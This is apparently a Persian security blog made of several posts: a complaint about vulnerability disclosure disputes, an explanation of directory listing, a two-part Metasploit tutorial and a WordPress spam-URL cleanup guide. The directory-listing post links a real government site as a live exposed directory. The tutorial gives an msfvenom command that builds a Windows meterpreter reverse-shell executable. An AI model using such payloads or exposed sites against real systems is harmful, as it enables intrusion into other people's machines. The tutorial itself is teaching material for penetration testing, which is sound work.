در بهترین حالت بعد از پیدا کردن لینک در داخل سازمان، بحث بر سر شدت آسیب ‌پذیری به بدترین شکل ممکن صورت می‌گیرد.

بدین ‌صورت که هکر کلاه ‌سفید، اصرار بر خطرناک بودن آسیب ‌پذیری خود دارد، در عین حال، سازمان، ادعای امن بودن کرده و تقاضای دیدن POC برای تخمین شدت آسیب‌پذیری را دارد.

هکر کلاه سفید به دلیل ترس از (از دست دادن آسیب پذیری)، از دادن جزئیات امتنا می‌کند.

در اکثر مواقع هم بعد از ارائه جزئیات توسط هکر کلاه سفید، سازمان اظهار کم اهمیت بودن سامانه آسیب‌پذیر را می‌کند.

این روال بسیار غلط است، اصلا نیازی به کشف روال صحیح نیست، کافی است ببینیم سازمان‌ها و شرکت‌های بزرگ دنیا چه کار می‌کنند؟

 

 

چطور می توانم کتاب را تهیه کنم؟

برای تهیه کتاب کافیست وارد وب‌سایت زیر شوید و نسخه pdf کتاب را تهیه بفرمایید.

سایت فروش کتاب

 

 

 

ضعف امنیتی Directory Listing

ضعف امنیتی Directory Listing

سلام خدمت دوستان عزیز

Directory listing حمله ایست که هکر را قادر می سازد تا به دایرکتوری‌های وب سرور آپاچی دسترسی پیدا کند که می‌تواند به هکر کمک کند تا بتواند به سرعت منابع را در یک مسیر مشخص شناسایی کند و به طور مستقیم به تجزیه و تحلیل و حمله به آن منابع اقدام کند.

این حمله باعث می شود تا فایل های حساس که کاربران به آن‌ها دسترس ندارند، مانند فایل‌ها و دایرکتوری‌های مهم روی سرور و… در معرض خطر قرار گیرند.

برای نمونه شما فرض کنید در وب سرور خود پوشه ای با نام  admin/backup دارید که درون آن فایل‌های شخصی (مانند پسوردها، نام‌های کاربری، شماره‌ها و…) خود را ذخیره کرده اید. حال هکر با استفاده از ابزارهای تست نفوذ خود، نام پوشه شما را به دست می آورد و با وجود این آسیب پذیری بر روی سرور شما، می‌تواند به محتویات داخل پوشه شما دسترسی داشته باشد.

ضعف امنیتی Directory Listing

 

هکر به چگونه از این آسیب پذیری استفاده می‌کند؟

به طور مثال ما از سایتمان backup تهیه کردیم و آن را در یک پوشه ذخیره کرده‌ایم، هکر با وارد شدن به پوشه، backup را دانلود کرده و با استفاده از کانفیگ موجود سایتمان را هک می کند یا …

http://cholistan.gov.pk/db

برای رفع باگ directory listing  کافیست یک فایل php یا html با نام index در مسیر مورد نظر آپلود کنیم.

اگر دوست داشتید می‌تونید ویدئو “تست امنیت ۲ سایت داخلی” که دقیقا پیرامون همین موضوع است رو مشاهده کنید.

 

آموزش SEC580 – بخش دوم

سلام خدمت شما

با قسمت دوم از دوره SEC580 در خدمتتون هستم.

با توجه به درگیری‌های کاری سعی می کنم هر هفته ۱ تا ۲ پارت از این آموزش را منتشر کنم.دوره به صورت فشرده و کوتاه خواهد بود.

انواع Payload:

Payload ها انواع مختلفی دارند که متاسپلویت از آنها پشتیبانی می‌کند و توانایی بهره‌برداری از آنان را به ما می‌دهد.

 Inline و  non-staged

به پیلودهای حاوی Exploit و یا Full Shell code به منظور اجرای یک کار خاص پیلودهای non-staged و یا Inline می‌گویند.

Stager:

این نوع پیلود با پیلود های Staged کار می کند و وظیفه برقراری ارتباط بین مهاجم و فرد قربانی را دارد و با ایجاد یک Channel اطلاعات مد نظر فرد مهاجم را از آن عبور میدهد

Meterperter:

یک پیلود چند وجهی و یا همان Multi-Faceted می‌باشد که با استفاده از dll injection از راه دور به سیستم فرد قربانی حمله می‌کند و موجب ایجاد دسترسی می‌شود.

این نوع پیلود هیج اثری بر روی Hard-Disk نمی‌گذارد و تمامی بدافزارها را در Memory اجرا می‌کند.

کشف و بازرسی این پیلود با روش‌های ساده Digital Forensic بسیار سخت و دشوار می‌باشد.

PassiveX:

این نوع پیلود برای گذر از فایروال ها می باشند که از استفاده از ActiveX و IE به منظور ساخت یک http Tunnel به منظور ارسال و دریافت اطلاعات مد نظر فرد مهاجم مانع شناسایی شدن پیلود می شود.

NONX:

این پیلول وظیفه دور زدن NX را دارد، در برخی CPU ها به منظور جلوگیری از اجرای کد بر روی قسمت‌های مختلف حافظه از NX استفاده می‌شود که در ویندوز NX با نام DEP مخفف Data Execution Prevention پیاده سازی می‌شود و NONX توانایی دورزدن آن را نیز دارد.

IPv6:

همانطور که از نام آن پیداست این نوع پیلود برای استفاده در شبکه‌های مجهز به IPv6 می‌باشد

لیستی از Payload های موجوددر متاسپلویت

bind_tcp
bind_tcp_ipv6
bind_nonx_tcp
reverse_tcp
reverse_http
reverse_tcp_ipv6
reverse_nonx_tcp
reverse_tcp_allport
x64/bind_tcp
x64/reverse_tcp

با دستور msfconsole محیط برنامه را باز می‌کنیم.با استفاده از دستور banner می‌توانیم حالت شروع کنسول متاسپلویت را تغییر دهیم.

به منظور پیدا کردن سریع‌تر اکسپلویت‌ها، ماژول‌ها و یا Payload‌ها می‌توانیم از دستور search استفاده کنیم.

برای مثال من قصد دارم اسکنر های Port در متاسپلویت را ببینم

search <name>

چند مثال عملی

search cve:2019 type:exploit platform:windows app:client firefox

تمامی اکسپلویت‌های firefox با این مشخصات را برای ما نمایش می‌دهد

اگر زمانی بخواهیم کل اکسپلویت‌های موجود در متاسپلویت را با این مشخصات ببینیم مرتبط به هر پروتکل و نرم افزاری از دستور بالا به شکل زیر استفاده می‌کنیم

search cve:2019 type:exploit platform:windows app:client

نکته: در صورت نمایش ندادن خروجی خاصی به معنی این است که مشخصاتی که وارد کرده اید، در متاسپلویت وجود ندارد.

به منظور وارد شدن و به کار گرفتن این ماژول ما از دستور use استفاده می‌کنیم و وارد آن می‌شویم.

اصول نوشتاری دستور use به این شکل می‌باشد

use <Module_name>

حالا مراحل رو با مثال دیگری دنبال کنیم:

search portscan

use /auxiliary/scanner/portscan/tcp

با استفاده از دستورات متنوع show ما توانایی دیدن مقدار اطلاعات مختلف در رابطه با ماژول‌ها و اجزای مختلف متاسپلویت را داریم.

دستور show options برای ما پارامترهای مورد نیاز برای تنظیم آنها را نمایش می‌دهد که در ماژول‌های مختلف متاسپلویت دوپارامتر کاربرد بسیار دارند، پارامترهای RHOSTS و RPORTS برای ما اهمیت ویژه دارند.

مقدار RHOSTS مخفف Remote HOSTS تایین کننده IP هدف ما می‌باشد و RPORTS مخفف Remote PORT تعیین کننده Port هدف ما می‌باشد.این مقدارها را با استفاده از دستور set می‌‍توانیم تنظیم کنیم.

آموزش SEC580 - بخش دوم

اصول نوشتاری دستور set:

set <Variable> <Vaule>

set RHOSTS TargetURL/TargetIP

set PORTS 80

همانطور که در بالا گفتیم دستور show محتویات بسیاری را برای ما نمایش می‌دهد. برای مثال ما می‌توانیم از این دستور به منظور نمایش تمامی Exploit ها و یا ماژول‌های Auxiliary استفاده کنیم.

نمونه‌ای از این دستورات:

show exploits

نمایش تمامی اکسپلویت‌های قایل استفاده در متاسپلویت

show auxiliary 

نمایش تمامی ماژول‌های Auxiliary در متاسپلویت

show payloads

فرض کنید قرار است از طریق یک اکسپلویت به یک سیستم حمله کنیم و برای گرفتن دسترسی نیاز به یک پیلود دارید و پیلودهای قابل استفاده برای آن اکسپلویت را با این دستور می‌‍توانیم مشاهده کنیم

show encoders 

نمایش تمامی Encoder های قابل استفاده در متاسپلویت

show post

نمایش تمامی ماژول‌های Post-Exploiting قابل استفاده در متاسپلویت

show advanced

دیدن اطلاعات یک ماژول

از دستور Generate  به منظور تبدیل یک پیلود به کد استفاده می‌کنیم.

دستور بعدی:

info <Module_name>

مثال:

info auxiliary/scanner/portmap/portmap_amp

دستوری بعدی help نام دارد که برای کمک کردن به ما آماده شده است.برای نمونه:

help set

آموزش SEC580 – بخش اول

سلام خدمت شما

امروز تصمیم گرفتم که دوره SEC580 رو به صورت متنی در وب سایت شخصی خودم منتشر کنم تا چراغ راهی باشه برای علاقه‌مندان به مباحث تست نفوذ از طریق متاسپلویت که بتوانند به صورت رایگان به این محتوای ارزشمند دسترسی داشته باشند.

با توجه به درگیری‌های کاری سعی می کنم هر هفته ۱ تا ۲ پارت از این آموزش را منتشر کنم.دوره به صورت فشرده و کوتاه خواهد بود.

آموزش SEC580 - بخش اول

دوره آموزشی SEC580 از دوره‌های موسسه SANS است که به آموزش ابزار قدرتمند متاسپلویت می پردازد.

ابتدا باید ببینیم متاسپلویت چیست؟

متاسپلویت در ژوئیه سال ۲۰۰۳ ایجاد شد است. نسخه ۱٫۰ نوشته شده با زبان پرل و شامل رابط کاربری گرافیکی بر اساس curses است. نسخه سوم به‌طور کامل به زبان روبی بازنویسی شد و توسط Metasploit, LLC توسعه یافت. (تأسیس شده توسط توسعه دهندگان در سال ۲۰۰۶).

شما با استفاده از این فریم ورك می‌توانید آسیب پذیری‌هاي موجود در سیستم‌ها، پروتکل‌ها و نرم افزارهاي مختلف را شناسایی کرده و آنها را مورد نفوذ و یا حمله قرار دهید.

این اپلیکیشن به صورت پیش فرض  دارای اکسپلویت‌هاي بسیاری می‌باشد ولی علاوه بر آن شما می‌توانید اکسپلویت مورد نظر خودتان را ایجاد و به آن اضافه کنید.

نصب فریم ورک متاسپلویت

این فریم ورک به صورت پیش فرض در سیستم عامل کالی لینوکس وجود دارد و شما می‌توانید به راحتی از آن استفاده کنید.

اما اگر مایل به نصب متاسپلویت بر روی توزیع دیگری از لینوکس هستید، مشکلی وجود ندارد.باید به این شکل عمل کنید.

sudo apt-get install gpgv2 autoconf bison build-essential curl git-core libapr1 libaprutil1 libcurl4-openssl-dev libgmp3-dev libpcap-dev libpq-dev libreadline6-dev libsqlite3-dev libssl-dev libsvn1 libtool libxml2 libxml2-dev libxslt-dev libyaml-dev locate ncurses-dev openssl postgresql postgresql-contrib wget xsel zlib1g zlib1g-dev

پس از نصب وارد لینک زیر شوید و فایل metasploit.run را دانلود کنید

https://github.com/rapid7/metasploit-framework/wiki/Downloads-by-Version

به ترتیب دستورات را وارد کنید:

mkdir /opt/metasploit

mv metasploit.run /opt/metasploit

chmod +x metasploit.run

./metasploit.run

پس نصب دستور msfconsole را وارد کنید تا محیط متاسپلویت برای شما اجرا شود.

حال نیاز است که با بخش‌های مختلف این فریم ورک آشنا شویم.

متاسپلویت دارای ماژول های مختلفی و تقسیم بندی های مختلفی است که به شرح زیر می باشند تعداد ۱۸۸۶ اکسپلویت، تعداد ۱۰۶۵ Auxiliary ، تعداد ۳۲۸ ماژولPost ، تعداد ۵۴۶ Payload و تعداد ۴۴ encoder و ۱۰ Nops و ۲ evasion.

متااسپلویت چندین رابط کاربری دارد. در گذشته رابط های آن بیشتر بود برای مثال msfcli و msfencode که جای خود را به msfpayload دادند.

بریم سراغ تست ابزار:

 قصد دارم یک Payload برای سیستم عامل ویندوز با استفاده از msfpayload ایجاد کنم. این رابط کاربری متاسپلویت وظیفه msfcli و msfencode را انجام می دهد.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f exe > shell.exe

با استفاده از سوییچ -p ، Payload مد نظر را تعیین میکنیم. به جای<Local Port>  یک Port را وارد کنید برای مثال ۴۴۴۴٫

 به جای Local IP Address درواقع IP سیستم خود را وارد کنید.

 با استفاده از سوییچ -f فرمت فایل و در آخر هم خروجی را در یک فایل exe با نام shell قرار دادیم .

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.40 LPORT=4444 -f exe > shell.exe

هک وردپرس با URL Injection

سلام خدمت شما

مدتی است که بسیاری از سایت‌های وردپرسی دچار مشکل مشابهی میشن که اینجا لازم دیدم توضیحی در مورد این مشکل و نحوه رفع اون برای دوستان عزیز قرار بدم.

اخیرا مدیران سایت‌های مختلف ایمیل میزنن و بیان می‌کنند که یکسری لینک چینی و ژاپنی در گوگل برای سایتشون ثبت شده و با این عنوان که سایتمون رو هک کردن ابراز نگرانی می‌کنند.

URL injection

این بدین معنی است که هکر در سایت شما صفحاتی ساخته که معمولا شامل کلمات و لینک‌های اسپم است. بعضی اوقات این صفحات جدید شامل کدهایی هستند که کارهای مخصوصی انجام می‌دهند. به عنوان مثال کاربران، سایت شما را به سایت‌های دیگر منتقل می‌کنند یا به وب سرور شما صدمه می‌زنند و اینجاست که می‌گوییم هک شدن وردپرس با URL injection اتفاق افتاده است.

هکرها معمولا این تغییرات را از راه‌های زیر انجام می‌دهند:

  • داشتن دسترسی به یکی از پوشه‌های موجود در سرور یا هاست؛ به عنوان مثال ممکن است به یکی از پوشه‌های هاست خود بصورت کاملا ناخواسته دسترسی کاربر را داده‌اید.
  • استفاده از نسخه‌های قدیمی وردپرس و سوء استفاده هکر از باگ‌های امنیتی موجود در این نسخه‌ها
  • هک کردن افزونه‌های third-party که در سایت خود نصب کرده‌اید؛ مثل افزونه‌های شمارش تعداد بازدید سایت.

چگونه متوجه وجود این اسپم شویم؟

با بررسی حساب Google Search Console این مورد مشخص می‌شود زیرا تعداد صفحات ایندکس شده به طور قابل توجهی افزایش میابد.

همچنین قسمت پیام‌های Search Console را نیز بررسی کردیم اما چیزی مشاهده نشد و عجیب به نظر می‌رسید. در این حالت مثلا باید پیام “سایت شما ممکن است هک شده باشد” را دریافت می‌کردیم.

روش دیگه جستجو در گوکل به صورت زیر است: 

site:yourwebsite.com

هک وردپرس با URL Injection

چگونه مشکل ساخت آدرس‌ های جعلی در وردپرس را حل کردیم؟

اولین کاری که باید انجام داد، حذف افزونه مخرب است که این لینک‌ها را ایجاد کرده بود. چندین افزونه هستند که اسپم‌ها را شناسایی و حذف می‌کنند؛ افزونه‌های محبوبی مثل WP Spam Shield، WordFence و Sucuri.

پاک کردن اسپم از ایندکس گوگل

روش اول : ممکن است شما هم به فکر استفاده از ابزار Remove URLs در Google Search Console باشید اما نه تنها حذف این لینک‌ها به اندازه ایندکس شدن آن‌ها زمان بر است، بلکه گوگل آن‌ها را به صورت موقتی پاک می‌کند (۹۰ روز). و تا این زمان هک شدن وردپرس با URL injection ادامه دارد. اما راه‌حل بعدی بهتر به نظر می‌رسد.

روش دوم :

  1. همه ی URL های اسپم را از نتایج گوگل دانلود کنید.
  • اگر نتیجه‌های اسپم زیادی دارید، می‌توانید افزونه گوگل کروم به نام Infinite Scroll add-on  را نصب کنید. این افزونه به شما اجازه می‌دهد تا با یک کلیک به صفحه آخر نتایج بروید تا بتوانید تمامی نتیجه‌های گوگل را مشاهده کنید.
  • می‌توانید از افزونه Link Klipper نیز برای دانلود نتایج سایت در گوگل استفاده کنید. قطعا این راه خیلی راحت تر از کپی کردن تک تک نتایج است.
  1. کلمه‌ای که در صفحات اسپم شده تکرار شده است را پیدا کنید و آن را جلوی site:yourwebsite.com قرار دهید و عبارت را در گوگل جستجو کنید. مثل عبارت site:yourwebsite.com dating
  2. به نتایج انتهایی بروید.
  3. هنگامی که تمامی نتیجه‌ها بارگذاری شدند، راست کلیک کنید و Link Klipper را انتخاب کنید و روی Extract all links کلیک کنید. در این حالت یک فایل اکسل ساخته می‌شود.
  4. فایل اکسل را باز کنید و نتایج را براساس a to z مرتب کنید. سپس آن لینک‌هایی که مربوط به سایت شما است و لینک سایت شما در آن قرار دارد را کپی کنید. لینک‌های دیگر را نادیده بگیرید.
  5. شما با کمک افزونه yoast seo نیز می‌توانید نقشه سایت خود را کامل بسازید.
  6. یک نام مشخص برای فایل XML خود بگذارید. حال فایل را در روت سایت خود (در پوشه public_html) آپلود کنید تا آدرس دسترسی به آن چیزی شبیه به website.com/sitemap-name.xml باشد.
  7. حال به Google Search Console بروید و از قسمت crawl و sitemaps، sitemap جدید را به گوگل معرفی کنید.
  8. صفحه را دوباره باز کنید؛ می‌بینید که وضعیت sitemap به حالت submitted در می‌آید.
  9. اگر بیش از ۱۰۰۰ آدرس‌ های جعلی در وردپرس دارید، بعید است که بتوانید همه آن‌ها را در یک اقدام دانلود کنید. پس مجبورید این مراحل را برای بقیه لینک‌ها در روز بعدی انجام دهید.
  • لینک‌های اسپم را از نتایج جستجوی گوگل دانلود کنید و هر بار آن را به همان فایل اکسل اول اضافه کنید.
  • هر بار که لینک جدید اضافه می‌کنید، روی دکمه Remove duplicates در اکسل کلیک کنید تا جایی که تعداد لینک‌ها با آدرس‌ های جعلی در وردپرس موجود در نتایج گوگل برابر شود.
  • فایل sitemap جدید را در گوگل دوباره ثبت کنید.